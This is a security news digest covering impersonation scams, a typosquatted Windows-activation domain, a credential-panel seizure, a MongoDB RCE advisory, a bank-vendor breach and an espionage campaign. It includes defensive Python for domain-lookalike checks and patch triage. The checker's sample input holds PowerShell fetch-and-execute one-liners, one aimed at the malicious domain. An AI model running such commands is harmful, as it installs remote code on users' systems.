Criminals impersonate senior US officials in messaging scams

Published: 2025-12-25

1. Criminals impersonate senior US officials in messaging scams


December 21: The US Federal Bureau of Investigation recently issued a warning that, since 2023, cybercriminals have been persistently impersonating senior state-government officials, White House officials, cabinet members and members of Congress, using text messages and AI-generated voice messages to run targeted scams against the officials' family members and personal acquaintances. The attacks unfold as a two-stage "SMS phishing plus voice cloning" scheme: the criminals first send fraudulent text messages that appear to come from an authoritative body, then place AI-generated voice calls or leave voicemails that use familiar topics as bait, and quickly press the victim to move the conversation to encrypted messaging apps such as Signal, Telegram or WhatsApp. Once on the encrypted app, the attackers build trust by discussing current events or bilateral relations, or by fabricating scenarios such as a board nomination or arranging a meeting with the President; they then request verification codes in order to sync contact lists, ask for copies of sensitive documents such as passports, demand wire transfers to overseas financial institutions, or induce the victim to introduce them to further contacts. Tom Cross, head of threat research at GetReal Security, points out that threat actors are using deepfake technology to carry out social-engineering attacks: a voice sample of only 30 seconds is enough for AI voice cloning to imitate a person convincingly, and voice samples of public officials and executives are easy to obtain through public channels.


https://cybernews.com/news/criminals-impersonate-senior-us-officials-in-messaging-scams/


2. Misspelled domain leads to Cosmali Loader malware infections


December 24: The security community recently reported a malware infection incident caused by a misspelled domain name. Exploiting careless typing by users, the attackers registered "get.activate[.]win", a domain closely resembling the official domain of Microsoft Activation Scripts (MAS), "get.activated.win", differing only by the missing letter "d". Users who visited it were lured into executing a malicious PowerShell script, which ultimately infected their Windows systems with the "Cosmali Loader" malware. According to reports, several MAS users have reported on Reddit that their systems displayed pop-up warnings about a Cosmali Loader infection. Security researcher RussianPanda found through analysis that the malware's control panel contains a security vulnerability, which the attackers can use to access victims' computers remotely and deploy cryptocurrency-mining tools and the XWorm remote access trojan (RAT). GDATA malware analyst Karsten Hahn had previously observed similar pop-up notifications, further confirming that this incident is linked to the open-source Cosmali Loader malware. MAS is an open-source collection of PowerShell scripts that automate the activation of Windows and Office through techniques such as HWID activation and KMS emulation; Microsoft explicitly regards it as a piracy tool because it uses unauthorized methods to bypass the licensing system. The project's maintainers have warned users to check the spelling of the domain carefully before running any command, so as to avoid reaching a malicious domain through a typing error.
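The incident above turns on a host name one letter away from the real one. The following is an added example, not code from the article, from the MAS project or from the researchers named in it: a lookalike check that flags any download host within one edit of an allowlisted host before a "download and run" command is executed. The allowlist is an assumption for the example; its single entry is the official MAS host the article quotes, and the sample commands are constructed.

```python
"""Lookalike-hostname check for the typosquatting pattern described above.

Added example; not code from the article, the MAS project or the researchers
it names. KNOWN_GOOD is an assumed allowlist whose only entry is the official
MAS host quoted in the article.
"""
import re

# Hosts a command is allowed to download from (assumed allowlist).
KNOWN_GOOD = ("get.activated.win",)

# Matches the host part of any http(s) URL inside a command line,
# including defanged hosts written with "[.]".
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)", re.IGNORECASE)


def refang(host: str) -> str:
    """Turn a defanged host like 'get.activate[.]win' into a real one."""
    return host.replace("[.]", ".").lower().rstrip(".")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: insertions, deletions and substitutions cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def classify(host: str, known_good=KNOWN_GOOD, max_distance: int = 1) -> str:
    """'known-good', 'lookalike' (within max_distance edits of an allowlisted
    host, e.g. one dropped letter) or 'unknown'."""
    h = refang(host)
    if h in known_good:
        return "known-good"
    if any(edit_distance(h, g) <= max_distance for g in known_good):
        return "lookalike"
    return "unknown"


def audit_command(cmd: str) -> list:
    """Return (host, verdict) for every URL host found in a command line, so a
    one-liner can be checked before it is pasted into a shell."""
    return [(refang(h), classify(h)) for h in URL_HOST.findall(cmd)]


if __name__ == "__main__":
    # Constructed sample commands (not quoted from the article); the second
    # uses the misspelled domain the article describes.
    samples = [
        "irm https://get.activated.win | iex",
        "irm https://get.activate[.]win | iex",
        "irm https://example.invalid/setup.ps1 | iex",
    ]
    for s in samples:
        print(s, "->", audit_command(s))
```

A distance of 1 catches the single dropped letter in this case; raising `max_distance` widens the net to transposed or swapped characters at the cost of more false positives on short host names, so the allowlist should hold only hosts you actually fetch installers from.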


https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/


3. FBI seizes the web3adspanels[.]org domain


December 24: The US Federal Bureau of Investigation (FBI) recently seized the domain "web3adspanels[.]org" together with its database. A criminal group used the domain to store and manipulate bank login credentials stolen from US victims, and then carried out large-scale bank account takeover fraud. According to the Department of Justice, the group placed fake advertisements on search engines such as Google and Bing that imitated genuine bank advertisements to lure users into clicking. Victims who clicked were redirected to a fraudulent website controlled by the criminals, and when a user entered bank login credentials, malicious software on the site captured them immediately. The criminals then used the stolen credentials to log in to the real bank websites and drain the accounts. The investigation showed that the domain served as a back-end web panel hosting thousands of stolen bank login credentials and remained in operation until November 2025. Estonian authorities have preserved and collected the server data and stolen credentials from the host of the phishing pages, providing key evidence for the continuing investigation. The FBI confirmed that at least 19 US victims lost about $14.6 million to the scheme and faced a further $28 million in attempted losses.


https://securityaffairs.com/186094/cyber-crime/fbi-seized-web3adspanels-org-hosting-stolen-logins.html


4. MongoDB issues urgent advisory: critical RCE vulnerability requires immediate patching


December 24: MongoDB recently published an urgent security advisory warning IT administrators that they must immediately patch the critical vulnerability tracked as CVE-2025-14847. The vulnerability affects MongoDB 8.2.0 through 8.2.3, 8.0.0 through 8.0.16, 7.0.0 through 7.0.26, 6.0.0 through 6.0.26, 5.0.0 through 5.0.31, 4.4.0 through 4.4.29, and all v4.2, v4.0 and v3.6 releases. An unauthenticated attacker can use it to launch a low-complexity remote code execution (RCE) attack and take control of the target server without any user interaction. The root cause is inconsistent handling of length parameters in the MongoDB server: by tampering with packets in the zlib compression implementation, an attacker can trigger an uninitialized heap memory access and go on to execute arbitrary code. The MongoDB security team stressed that the conditions for large-scale exploitation are already in place and advised administrators to upgrade immediately to a fixed release: 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32 or 4.4.30. Where an immediate upgrade is not possible, zlib compression must be explicitly disabled when starting mongod/mongos, using the networkMessageCompressors or net.compression.compressors parameter.
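To turn the advisory above into a fleet check, the following added example (not code from MongoDB or from the advisory) classifies each server as patched, mitigated (unpatched, but zlib already removed from the negotiable compressors) or vulnerable. The only facts it takes from the text are the fixed release numbers and the two option names; the config parsing, the assumed default compressor list and the sample mongod.conf fragments are this example's own.

```python
"""Fleet triage for the MongoDB advisory above (CVE-2025-14847).

Added example, not code from MongoDB or from the advisory. Fixed release
numbers and option names come from the advisory text; everything else here
(config parsing, default compressor list, sample configs) is assumed.
"""
import re

# First fixed release per branch, as listed in the advisory. Branches with no
# entry (4.2, 4.0, 3.6) have no fixed release and stay vulnerable.
FIXED = {
    (8, 2): (8, 2, 3), (8, 0): (8, 0, 17), (7, 0): (7, 0, 28),
    (6, 0): (6, 0, 27), (5, 0): (5, 0, 32), (4, 4): (4, 4, 30),
}

# Assumed mongod default for net.compression.compressors (4.2 and later):
# zlib is negotiable unless the operator removed it, so an absent key
# counts as zlib enabled.
DEFAULT_COMPRESSORS = "snappy,zstd,zlib"


def parse_version(text: str) -> tuple:
    """'7.0.26' or '7.0.26-rc0' -> (7, 0, 26)."""
    nums = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_patched(version: str) -> bool:
    v = parse_version(version)
    fixed = FIXED.get(v[:2])
    return fixed is not None and v >= fixed


def compressors_from_config(config: str) -> str:
    """Read the compressor list from a mongod.conf YAML fragment or from a
    command line using --networkMessageCompressors; fall back to the default."""
    m = re.search(r"^\s*compressors:\s*['\"]?([\w,\s]+?)['\"]?\s*$", config, re.M)
    if not m:
        m = re.search(r"--networkMessageCompressors[=\s]+['\"]?([\w,]+)", config)
    return m.group(1).strip() if m else DEFAULT_COMPRESSORS


def zlib_enabled(compressors: str) -> bool:
    return "zlib" in {c.strip().lower() for c in compressors.split(",")}


def triage(version: str, config: str) -> str:
    """'patched', 'mitigated' (unpatched but zlib removed) or
    'vulnerable' (unpatched with zlib negotiable on the wire)."""
    if is_patched(version):
        return "patched"
    if not zlib_enabled(compressors_from_config(config)):
        return "mitigated"
    return "vulnerable"


# Constructed mongod.conf fragments (not from the advisory): the default
# setting and the interim workaround that drops zlib from the list.
WEAK_CONF = "net:\n  port: 27017\n  compression:\n    compressors: snappy,zstd,zlib\n"
HARDENED_CONF = "net:\n  port: 27017\n  compression:\n    compressors: snappy,zstd\n"

if __name__ == "__main__":
    for ver, conf in [("7.0.26", WEAK_CONF), ("7.0.26", HARDENED_CONF),
                      ("7.0.28", WEAK_CONF), ("4.2.25", HARDENED_CONF)]:
        print(ver, triage(ver, conf))
```

"Mitigated" is a holding state, not a fix: the workaround only removes the vulnerable code path from negotiation, and a 4.2 or older server has no fixed release to move to, so it should be scheduled for a branch upgrade rather than left on the workaround.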


https://www.bleepingcomputer.com/news/security/mongodb-warns-admins-to-patch-severe-rce-flaw-immediately/


5. Marquis breach leads to customer data leaks at multiple banks


December 24: Two US banks, VeraBank and Artisans' Bank, have disclosed in turn that a cyberattack on their third-party vendor Marquis Software Solutions led to the leak of a large amount of customer information. VeraBank, headquartered in Texas, disclosed that the incident affected 37,318 customers; the exposed information included names and other personal information that was not specifically identified, with the exact data varying by customer. Artisans' Bank of Delaware stated that the names and Social Security numbers of 32,344 customers may have been accessed without authorization. Both banks stressed that the attack was confined to Marquis systems and that their own systems were not affected. Marquis said it had opened an internal investigation into the data breach, which occurred on August 14, and notified law enforcement. However, Artisans' Bank did not learn of the incident until late October and only recently became aware that customer information might have been exposed. In November, Norway Savings Bank (NSB) had also suffered a data leak due to a ransomware attack on Marquis, exposing sensitive data of 51,000 customers, including names, addresses, dates of birth, Social Security numbers, tax identification numbers and financial account information.


https://cybernews.com/news/bank-marquis-software-vendor-attack/


6. Evasive Panda carries out targeted intrusions across multiple countries


December 25: Kaspersky Lab recently published a report revealing that the notorious cyber-espionage group Evasive Panda launched a new wave of sophisticated attacks against China, India and Turkey between November 2022 and November 2024. Active since 2012, the group uses DNS hijacking, adversary-in-the-middle (AitM) attacks and fake software updates to deliver its signature backdoor MgBot, achieving persistent presence on systems and data theft. The attack chain begins with a carefully crafted "legitimate disguise": the attackers impersonate the update programs of popular software such as Sohu Video, iQIYI Video, IObit Smart Defrag and Tencent QQ, plant malicious code in legitimate installation folders, and have it executed by trusted system services. More covertly, the group uses AitM techniques to hijack network traffic: by tampering with DNS responses, it redirects users' visits to dictionary.com to attacker-controlled servers, which load the second-stage payload as encrypted shellcode disguised as a PNG file. This targeted delivery, based on geographic location and ISP, makes the attacks highly selective and hard to reproduce in a lab. A newly developed loader masquerades as a Windows library file and injects MgBot into system processes such as svchost.exe via DLL side-loading, even using a decade-old signed executable to evade detection.


https://securityonline.info/evasive-panda-apt-hijacks-dictionary-com-and-app-updates-in-two-year-spree/